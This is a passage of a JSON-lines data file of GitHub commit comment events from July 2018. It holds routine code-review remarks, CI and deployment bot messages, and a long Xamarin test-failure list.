{"id":"7914750662","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29586448,"position":8,"line":8,"path":"Homework1/MainL1Ex1.java","commit_id":"355f9cccba857f500f3a1d49d609f5fc75cb0e75","created_at":"2018-07-03T20:09:04Z","updated_at":"2018-07-03T20:09:04Z","author_association":"OWNER","body":"для чого нам тут статичні поля, ми можемо і змінні просто оголосити в методі main"}},"created_at":"2018-07-03T20:09:04Z"}
{"id":"7914751033","type":"CommitCommentEvent","actor":{"login":"volkerjaenisch"},"repo":{"name":"plone/Products.CMFPlone"},"payload":{"comment":{"id":29586449,"position":null,"line":null,"path":null,"commit_id":"0909383eb2bbc8d31794a7dbf4392eec6236be22","created_at":"2018-07-03T20:09:10Z","updated_at":"2018-07-03T20:09:10Z","author_association":"NONE","body":"This change in particular line 462 breaks the catalog feature to sort on multiple columns. sort_on may be a list or tuple. "}},"created_at":"2018-07-03T20:09:10Z"}
{"id":"7914755275","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29586457,"position":null,"line":null,"path":null,"commit_id":"ec8efcaa76b682f8d1995c46b5caabb079dee3bb","created_at":"2018-07-03T20:10:10Z","updated_at":"2018-07-03T20:10:10Z","author_association":"MEMBER","body":"Should we save this to config?"}},"created_at":"2018-07-03T20:10:10Z"}
{"id":"7914755875","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29586459,"position":null,"line":null,"path":null,"commit_id":"13d69af0a4d201ab12d2558d9732b5c7f5e78c35","created_at":"2018-07-03T20:10:17Z","updated_at":"2018-07-03T20:10:17Z","author_association":"NONE","body":"158691015_Issue#6792 (Nigusse) - i386-Windows-7-VisualStudio-14: OK (2932 of 2932 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13d69af0a4d201ab12d2558d9732b5c7f5e78c35-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13d69af0a4d201ab12d2558d9732b5c7f5e78c35-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-03T20:10:17Z"}
{"id":"7914756413","type":"CommitCommentEvent","actor":{"login":"rbomhof"},"repo":{"name":"rbomhof/irc-d8-workflow"},"payload":{"comment":{"id":29586461,"position":null,"line":null,"path":null,"commit_id":"da14ba07a08ec8de9ebbc92c298319811824a0cc","created_at":"2018-07-03T20:10:24Z","updated_at":"2018-07-03T20:10:24Z","author_association":"OWNER","body":"Created multidev environment [irc-d8-workflow#pr-10](https://dashboard.pantheon.io/sites/0c518be8-4ef1-48d0-bf17-f9310a806c4d#pr-10).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-10-irc-d8-workflow.pantheonsite.io/)"}},"created_at":"2018-07-03T20:10:24Z"}
{"id":"7914757727","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29586464,"position":16,"line":16,"path":"week_one/CircleRP.java","commit_id":"c2e90416f34b14a33439e2865a5a048ba10a23d1","created_at":"2018-07-03T20:10:42Z","updated_at":"2018-07-03T20:10:42Z","author_association":"OWNER","body":"нам достатньо один раз ввести радіус і вже для цього кола обчислити периметр та площу"}},"created_at":"2018-07-03T20:10:42Z"}
{"id":"7914760416","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29586470,"position":null,"line":null,"path":null,"commit_id":"ec8efcaa76b682f8d1995c46b5caabb079dee3bb","created_at":"2018-07-03T20:11:21Z","updated_at":"2018-07-03T20:11:21Z","author_association":"COLLABORATOR","body":"Nah, I don't think it's neccessary. Saving during a session should be plenty for now."}},"created_at":"2018-07-03T20:11:21Z"}
{"id":"7914763602","type":"CommitCommentEvent","actor":{"login":"bodewig"},"repo":{"name":"apache/ant"},"payload":{"comment":{"id":29586480,"position":5,"line":931,"path":"manual/install.html","commit_id":"b7461ce2e43bda44a1ba5355f78288c85da773bc","created_at":"2018-07-03T20:12:08Z","updated_at":"2018-07-03T20:12:08Z","author_association":"MEMBER","body":"I'll change it tomorrow."}},"created_at":"2018-07-03T20:12:08Z"}
{"id":"7914763805","type":"CommitCommentEvent","actor":{"login":"jackwilsdon"},"repo":{"name":"beetbox/beets"},"payload":{"comment":{"id":29586482,"position":null,"line":null,"path":null,"commit_id":"3d9fba399f40655c4dec3670f71396bad6d18e7a","created_at":"2018-07-03T20:12:10Z","updated_at":"2018-07-03T20:12:10Z","author_association":"MEMBER","body":"If you're interested in try it out, why not try [installing the latest Git version of beets](https://beets.readthedocs.io/en/v1.4.7/faq.html#run-the-latest-source-version-of-beets)?"}},"created_at":"2018-07-03T20:12:10Z"}
{"id":"7914763973","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29586483,"position":24,"line":24,"path":"week_one/CountCall.java","commit_id":"76b58ce6857013f7a24994910d8b0a2d609cfdde","created_at":"2018-07-03T20:12:12Z","updated_at":"2018-07-03T20:12:12Z","author_association":"OWNER","body":"ще добре було би порахувати загальну суму"}},"created_at":"2018-07-03T20:12:12Z"}
{"id":"7914767158","type":"CommitCommentEvent","actor":{"login":"saber-nyan"},"repo":{"name":"ma1uta/jeon"},"payload":{"comment":{"id":29586488,"position":47,"line":1560,"path":"common-api/src/main/java/io/github/ma1uta/matrix/Event.java","commit_id":"f5a821cf439e27d2ff016e3189d1c5a650453774","created_at":"2018-07-03T20:12:55Z","updated_at":"2018-07-03T20:12:55Z","author_association":"NONE","body":"Typo~"}},"created_at":"2018-07-03T20:12:55Z"}
{"id":"7914767944","type":"CommitCommentEvent","actor":{"login":"draperunner"},"repo":{"name":"entur/tavla"},"payload":{"comment":{"id":29586490,"position":11,"line":30,"path":"src/components/table/Table.jsx","commit_id":"5e7b41ee38ee5953faed436b2a176486dca360f5","created_at":"2018-07-03T20:13:06Z","updated_at":"2018-07-03T20:13:06Z","author_association":"MEMBER","body":"ESLint klagar vel på double quotes? ;)"}},"created_at":"2018-07-03T20:13:06Z"}
{"id":"7914770832","type":"CommitCommentEvent","actor":{"login":"labcerouno"},"repo":{"name":"salesagility/SuiteCRM"},"payload":{"comment":{"id":29586496,"position":null,"line":null,"path":null,"commit_id":"2e5fc11011ecba69060546c1e5524fc17ed7b4ba","created_at":"2018-07-03T20:13:40Z","updated_at":"2018-07-03T20:13:40Z","author_association":"NONE","body":"This commit makes a contact's detail view throw: MySQL error 1054: Unknown column 'calls.date_due' in 'field list'. If I revert, it'll work correctly. "}},"created_at":"2018-07-03T20:13:40Z"}
{"id":"7914771176","type":"CommitCommentEvent","actor":{"login":"Remorax"},"repo":{"name":"Remorax/blockly"},"payload":{"comment":{"id":29586497,"position":155,"line":155,"path":"generators/velocity/text.js","commit_id":"c7b7053b57dbf2bbc56fe313f625fe08e366bdad","created_at":"2018-07-03T20:13:43Z","updated_at":"2018-07-03T20:13:43Z","author_association":"OWNER","body":"@aubincleme its defined over [here](https://github.com/Remorax/blockly/blob/master/generators/velocity.js#L185) :) "}},"created_at":"2018-07-03T20:13:43Z"}
{"id":"7914772700","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29586499,"position":null,"line":null,"path":null,"commit_id":"2b813bf74f113e1ad167fa97608619d22f2d62c6","created_at":"2018-07-03T20:14:04Z","updated_at":"2018-07-03T20:14:04Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-680](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-680).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-680-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-03T20:14:04Z"}
{"id":"7914774773","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29586502,"position":75,"line":75,"path":"homework1/Main.java","commit_id":"1fa4e411e2c5f4756ad851a0cb9d6605eee35923","created_at":"2018-07-03T20:14:33Z","updated_at":"2018-07-03T20:14:33Z","author_association":"OWNER","body":"добре було би мати один BufferedReader чи Scanner на всі методи"}},"created_at":"2018-07-03T20:14:33Z"}
{"id":"7914775805","type":"CommitCommentEvent","actor":{"login":"joksanxfr"},"repo":{"name":"NSO-developer/ntool"},"payload":{"comment":{"id":29586505,"position":null,"line":null,"path":null,"commit_id":"d85aa9338cd6ac543d9b6178f591442ca3fca2ce","created_at":"2018-07-03T20:14:47Z","updated_at":"2018-07-03T20:14:47Z","author_association":"NONE","body":"I would change the shebang to /usr/bin/python since that is what most systems use.\r\n\r\n-jfloresr"}},"created_at":"2018-07-03T20:14:47Z"}
{"id":"7914780234","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29586514,"position":null,"line":null,"path":null,"commit_id":"a5b0e187a0bfbaa47727d68f169b3c113d5527e7","created_at":"2018-07-03T20:15:48Z","updated_at":"2018-07-03T20:15:48Z","author_association":"COLLABORATOR","body":"I'm inclined to agree. It's a nice idea, and cool to see the panorama changing locations on the title screen, but the feature's kind of on the fence between HDSkins and MineLP. (minelp adds the data (ponyville textures) whilst hdskins has all the implementations)\r\n\r\nI'll probably rework this when I have more time."}},"created_at":"2018-07-03T20:15:48Z"}
{"id":"7914788125","type":"CommitCommentEvent","actor":{"login":"thheller"},"repo":{"name":"thheller/shadow-cljs"},"payload":{"comment":{"id":29586536,"position":null,"line":null,"path":null,"commit_id":"c84635f3e0bc1aa91e2e469be4d6b8ef750c869b","created_at":"2018-07-03T20:17:32Z","updated_at":"2018-07-03T20:17:32Z","author_association":"OWNER","body":"Sorry, just forgot got push https://github.com/thheller/shadow-cljs/commit/542ffce98d544ea4696a8f625df9e393580e4ce8"}},"created_at":"2018-07-03T20:17:32Z"}
{"id":"7914792142","type":"CommitCommentEvent","actor":{"login":"rbomhof"},"repo":{"name":"rbomhof/irc-d8-workflow"},"payload":{"comment":{"id":29586545,"position":null,"line":null,"path":null,"commit_id":"b4f6bac2fe3f0fc3286a6842b98d79a956c83662","created_at":"2018-07-03T20:18:27Z","updated_at":"2018-07-03T20:18:27Z","author_association":"OWNER","body":"Created multidev environment [irc-d8-workflow#ci-45](https://dashboard.pantheon.io/sites/0c518be8-4ef1-48d0-bf17-f9310a806c4d#ci-45).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-45-irc-d8-workflow.pantheonsite.io/)"}},"created_at":"2018-07-03T20:18:27Z"}
{"id":"7914794659","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29586549,"position":null,"line":null,"path":null,"commit_id":"a5b0e187a0bfbaa47727d68f169b3c113d5527e7","created_at":"2018-07-03T20:19:02Z","updated_at":"2018-07-03T20:19:02Z","author_association":"MEMBER","body":"Can you move this out to a new branch in the meantime?"}},"created_at":"2018-07-03T20:19:02Z"}
{"id":"7914795172","type":"CommitCommentEvent","actor":{"login":"fariouche"},"repo":{"name":"fariouche/rtl8812AU"},"payload":{"comment":{"id":29586552,"position":null,"line":null,"path":null,"commit_id":"418f36bba19bc28fd09c360f5e49d07529ed554e","created_at":"2018-07-03T20:19:09Z","updated_at":"2018-07-03T20:19:09Z","author_association":"OWNER","body":"Not sure when I will have time. If you are not in a hurry, this may be possible.\r\nBy the way, just tested this 5.2.20 with my 8821a chip and  speed was far better than before (200Mbits down / 90Mbits up)."}},"created_at":"2018-07-03T20:19:09Z"}
{"id":"7914796232","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"m-bosman/phpmyadmin"},"payload":{"comment":{"id":29586553,"position":null,"line":null,"path":null,"commit_id":"7604db65228110a7083db7137f5b932351049494","created_at":"2018-07-03T20:19:23Z","updated_at":"2018-07-03T20:19:23Z","author_association":"NONE","body":"<!-- PMABOT:SOB -->\nThis commit is missing Signed-Off-By line to indicate that you agree with phpMyAdmin Developer's Certificate of Origin. Please check [contributing documentation](https://github.com/phpmyadmin/phpmyadmin/blob/master/CONTRIBUTING.md) for more information."}},"created_at":"2018-07-03T20:19:23Z"}
{"id":"7914798776","type":"CommitCommentEvent","actor":{"login":"RasterizedBunny"},"repo":{"name":"RasterizedBunny/klonoa_heroes_translation"},"payload":{"comment":{"id":29586559,"position":null,"line":null,"path":null,"commit_id":"4bd3b307b833c1ecea984c004ee4cc221ebeeffd","created_at":"2018-07-03T20:19:57Z","updated_at":"2018-07-03T20:19:57Z","author_association":"OWNER","body":"I'm having trouble with the \"beast\" thing, I don't know where the heck that thing is or where to find more context about it (in-game). Need to play more.\r\n\r\nThat's also why lines 59 to 61 are untranslated. It seems the texts are scrambled all around, outta nowhere the sidequest involving Namco's characters popped up. (Also, goddammit Wada Don, speak without using a lot onomatopoeias! Don!"}},"created_at":"2018-07-03T20:19:57Z"}
{"id":"7914800726","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29586564,"position":null,"line":null,"path":null,"commit_id":"d79b29fa354a602d1d80f66b3e89a8fb2ff79535","created_at":"2018-07-03T20:20:24Z","updated_at":"2018-07-03T20:20:24Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [wordpresss](https://wordpresss-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/wordpress-s3](https://wordpresss-static-docs.pantheonsite.io/docs/wordpress-s3)\n"}},"created_at":"2018-07-03T20:20:24Z"}
{"id":"7914802039","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29586568,"position":null,"line":null,"path":null,"commit_id":"a5b0e187a0bfbaa47727d68f169b3c113d5527e7","created_at":"2018-07-03T20:20:41Z","updated_at":"2018-07-03T20:20:41Z","author_association":"COLLABORATOR","body":"Sure. This probably shouldn't have been pushed."}},"created_at":"2018-07-03T20:20:41Z"}
{"id":"7914814141","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29586595,"position":null,"line":null,"path":null,"commit_id":"13d69af0a4d201ab12d2558d9732b5c7f5e78c35","created_at":"2018-07-03T20:23:30Z","updated_at":"2018-07-03T20:23:30Z","author_association":"NONE","body":"158691015_Issue#6792 (Nigusse) - x86_64-MacOS-10.9-clang: OK (2930 of 2932 tests passed, 8 test warnings)\n\nMessages:\n\n * 9 tests had: AUD diffs.\n * 1 test had: BND diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MDD diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: RDD diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 644\n * Failed: 1\n\nregression Test Summary\n * Passed: 622\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13d69af0a4d201ab12d2558d9732b5c7f5e78c35-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13d69af0a4d201ab12d2558d9732b5c7f5e78c35-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.93%25-yellow.png)</a> \n"}},"created_at":"2018-07-03T20:23:30Z"}
{"id":"7914835835","type":"CommitCommentEvent","actor":{"login":"lcarozzi"},"repo":{"name":"pazcuturi/device-monitor"},"payload":{"comment":{"id":29586664,"position":12,"line":12,"path":"app/controllers/api/users_controller.rb","commit_id":"772f0fc4602662f87e23f9553bddd24910f9f93f","created_at":"2018-07-03T20:28:31Z","updated_at":"2018-07-03T20:28:31Z","author_association":"COLLABORATOR","body":"investigate using `find_by`"}},"created_at":"2018-07-03T20:28:31Z"}
{"id":"7914836569","type":"CommitCommentEvent","actor":{"login":"lcarozzi"},"repo":{"name":"pazcuturi/device-monitor"},"payload":{"comment":{"id":29586667,"position":5,"line":5,"path":"app/controllers/api/users_controller.rb","commit_id":"772f0fc4602662f87e23f9553bddd24910f9f93f","created_at":"2018-07-03T20:28:41Z","updated_at":"2018-07-03T20:28:41Z","author_association":"COLLABORATOR","body":"remove comments"}},"created_at":"2018-07-03T20:28:41Z"}
{"id":"7914838736","type":"CommitCommentEvent","actor":{"login":"felixfbecker"},"repo":{"name":"TypeStrong/ts-node"},"payload":{"comment":{"id":29586677,"position":null,"line":null,"path":null,"commit_id":"33cb1b5faecaa652b70fe97cb3665de7d42565c2","created_at":"2018-07-03T20:29:11Z","updated_at":"2018-07-03T20:29:11Z","author_association":"NONE","body":"I got it to work after changing `include` to `typeRoots`, changing all definitions to be in their own folder, named after the package, and the file being named `index.d.ts` (anything else wouldn't work).\r\n\r\nI would be nice if that note to the release notes as a migration hint - when getting automatic update PRs, the release notes are included in the PR so that helps a lot. The next thing I found was this commit, after which I still wasn't sure how to fix it. Thanks for your help."}},"created_at":"2018-07-03T20:29:11Z"}
{"id":"7914839819","type":"CommitCommentEvent","actor":{"login":"jillcary"},"repo":{"name":"Azure/device-telemetry-dotnet"},"payload":{"comment":{"id":29586680,"position":92,"line":81,"path":"Services/Helpers/QueryBuilder.cs","commit_id":"83fd69c0506e471dc43f3969eb6e68422a7d974c","created_at":"2018-07-03T20:29:25Z","updated_at":"2018-07-03T20:29:25Z","author_association":"CONTRIBUTOR","body":"nit: remove \"validate\" from the variable name."}},"created_at":"2018-07-03T20:29:25Z"}
{"id":"7914840691","type":"CommitCommentEvent","actor":{"login":"kvhnuke"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29586682,"position":5,"line":34,"path":"src/components/Blockie/Blockie.vue","commit_id":"b9b0a2c706a5e7a714e5caebe3ac7d992f3a9af6","created_at":"2018-07-03T20:29:37Z","updated_at":"2018-07-03T20:29:37Z","author_association":"CONTRIBUTOR","body":"why `function () {` ?"}},"created_at":"2018-07-03T20:29:37Z"}
{"id":"7914840809","type":"CommitCommentEvent","actor":{"login":"lcarozzi"},"repo":{"name":"pazcuturi/device-monitor"},"payload":{"comment":{"id":29586683,"position":19,"line":19,"path":"app/controllers/api/users_controller.rb","commit_id":"772f0fc4602662f87e23f9553bddd24910f9f93f","created_at":"2018-07-03T20:29:39Z","updated_at":"2018-07-03T20:29:39Z","author_association":"COLLABORATOR","body":"do we need to return the user?"}},"created_at":"2018-07-03T20:29:39Z"}
{"id":"7914841416","type":"CommitCommentEvent","actor":{"login":"lcarozzi"},"repo":{"name":"pazcuturi/device-monitor"},"payload":{"comment":{"id":29586684,"position":29,"line":29,"path":"app/controllers/api/users_controller.rb","commit_id":"772f0fc4602662f87e23f9553bddd24910f9f93f","created_at":"2018-07-03T20:29:47Z","updated_at":"2018-07-03T20:29:47Z","author_association":"COLLABORATOR","body":"same question"}},"created_at":"2018-07-03T20:29:47Z"}
{"id":"7914842361","type":"CommitCommentEvent","actor":{"login":"lcarozzi"},"repo":{"name":"pazcuturi/device-monitor"},"payload":{"comment":{"id":29586690,"position":37,"line":37,"path":"app/controllers/api/users_controller.rb","commit_id":"772f0fc4602662f87e23f9553bddd24910f9f93f","created_at":"2018-07-03T20:30:01Z","updated_at":"2018-07-03T20:30:01Z","author_association":"COLLABORATOR","body":"same issue with find"}},"created_at":"2018-07-03T20:30:01Z"}
{"id":"7914843142","type":"CommitCommentEvent","actor":{"login":"Arithmomaniac"},"repo":{"name":"relativitydev/Gravity"},"payload":{"comment":{"id":29586693,"position":28,"line":192,"path":"Gravity/Gravity/Base/BaseDto.cs","commit_id":"4d1db44d8b152f528f8a563796c3c8e766852b67","created_at":"2018-07-03T20:30:12Z","updated_at":"2018-07-03T20:30:12Z","author_association":"COLLABORATOR","body":"Use `BaseDto.GetParentArtifactIdProperty` to filter the list. you might not need this field at all."}},"created_at":"2018-07-03T20:30:12Z"}
{"id":"7914843964","type":"CommitCommentEvent","actor":{"login":"kvhnuke"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29586697,"position":46,"line":113,"path":"src/containers/HeaderContainer/HeaderContainer.vue","commit_id":"b9b0a2c706a5e7a714e5caebe3ac7d992f3a9af6","created_at":"2018-07-03T20:30:22Z","updated_at":"2018-07-03T20:30:22Z","author_association":"CONTRIBUTOR","body":"`toggleLogoutDropdown () {`"}},"created_at":"2018-07-03T20:30:22Z"}
{"id":"7914845510","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29586706,"position":null,"line":null,"path":null,"commit_id":"1b946b7cf68386f6c465732e2de9e038e6fdd31b","created_at":"2018-07-03T20:30:42Z","updated_at":"2018-07-03T20:30:42Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/58/display/redirect) (on internal Jenkins) failed in stage 'Test run' 🔥 : hudson.AbortException: script returned exit code 2\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/58//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/1b946b7cf68386f6c465732e2de9e038e6fdd31b/58/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/1b946b7cf68386f6c465732e2de9e038e6fdd31b/58/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/1b946b7cf68386f6c465732e2de9e038e6fdd31b/58/jenkins-results/generator-diff/index.html) (please review changes)\n🔥 [Test run failed](http://xamarin-storage/jenkins/xamarin-macios/xcode10/1b946b7cf68386f6c465732e2de9e038e6fdd31b/58/jenkins-results/tests/index.html) 🔥\n\n# Test results\n\n150 tests failed, 11 tests passed.\n\n## Failed tests\n\n * monotouch-test/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * framework-test/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * mini/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * interdependent-binding-projects/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * fsharp/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * mscorlib/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Core/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Data/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Net.Http/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Numerics/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Runtime.Serialization/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Transactions/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Web.Services/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml.Linq/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Security/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.ComponentModel.DataAnnotations/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Json/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel.Web/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Sqlite/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Tds/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression.FileSystem/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.CSharp/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Security/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.IdentityModel/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * introspection/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/iOS Unified 32-bits - simulator/Release: Skipped (No applicable devices found.)\n * link all/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * link all/iOS Unified 32-bits - simulator/Release: Skipped (No applicable devices found.)\n * link sdk/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * link sdk/iOS Unified 32-bits - simulator/Release: Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 32-bits - simulator/Debug (static registrar): Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 32-bits - simulator/Release (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 32-bits - simulator/Debug (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * framework-test/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * mini/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * interdependent-binding-projects/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * fsharp/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * mscorlib/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Core/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Data/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Net.Http/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Numerics/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Runtime.Serialization/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Transactions/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Web.Services/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml.Linq/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Security/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.ComponentModel.DataAnnotations/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Json/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel.Web/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Sqlite/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Tds/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression.FileSystem/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.CSharp/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Security/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.IdentityModel/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * introspection/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/iOS Unified 64-bits - simulator/Release: Skipped (No applicable devices found.)\n * link all/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * link all/iOS Unified 64-bits - simulator/Release: Skipped (No applicable devices found.)\n * link sdk/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * link sdk/iOS Unified 64-bits - simulator/Release: Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 64-bits - simulator/Debug (static registrar): Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 64-bits - simulator/Release (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 64-bits - simulator/Debug (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * framework-test/tvOS - simulator/Debug: Skipped (No applicable devices 